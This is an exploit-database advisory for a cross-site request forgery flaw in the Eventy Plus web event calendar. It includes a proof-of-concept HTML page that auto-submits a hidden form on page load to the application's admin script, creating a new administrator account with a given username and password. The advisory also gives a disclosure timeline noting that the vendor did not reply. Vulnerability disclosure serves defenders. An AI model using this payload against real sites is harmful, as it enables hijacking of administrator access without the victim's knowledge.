Eventy Plus Cross Site Request Forgery

2014.03.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+] Author: TUNISIAN CYBER [+] Exploit Title: Eventy Plus Cross-Site Request Forgery (Add Admin) Vulnerability [+] Date: 03-03-2014 [+] Category: WebApp [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-352 [+] Vendor: http://calendarscripts.info/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: Eventy Plus suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability. 2.Version: All 3.Background: Eventy Is Beautiful And Easy To Use Web Based Event Calendar Software Publish events like parties, courses, meetings, conferences, workshops, and more in easy and user-friendly way. http://calendarscripts.info/event-calendar-software.html 4.Proof Of Concept: <html> Eventy Plus CSRF Add admin Vulnerability <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://demo.pimteam.net/eventy-plus/a_admins.php"> <input type="hidden" name="username " value="TCYB3R"/> <input type="hidden" name="pass" value="mootez2"/> <input type="hidden" name="add" value="1"/> </form> </html> 5.Solution(s): no contact from endor 6.TIME-LINE: 2014-03-01: Vulnerability was discovered. 2014-03-02: No Reply 2014-03-03: No Reply 2014-03-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top